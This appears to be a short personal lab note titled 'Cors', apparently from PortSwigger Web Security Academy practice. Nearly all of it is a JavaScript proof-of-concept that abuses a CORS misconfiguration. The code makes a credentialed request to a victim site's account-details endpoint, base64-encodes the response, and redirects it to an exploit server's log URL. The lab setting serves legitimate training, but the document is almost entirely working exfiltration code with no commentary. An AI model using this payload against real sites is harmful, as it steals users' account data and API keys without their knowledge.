# Cors

<figure><img src="https://1116580734-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F80DU0lRP27yfgYzc3pOF%2Fuploads%2Fi5JsOf6oKoMDmXDPpcoN%2Fimage.png?alt=media&#x26;token=255ab47f-ff12-446b-a72d-60658bbc693a" alt=""><figcaption></figcaption></figure>

```javascript
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://accd1fd41f49fd57c0710d75007f00b6.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();

function reqListener() {
   location='//exploit-acde1f681f31fd46c0970d7d01670029.web-security-academy.net//log?key='+btoa(this.responseText);
};
```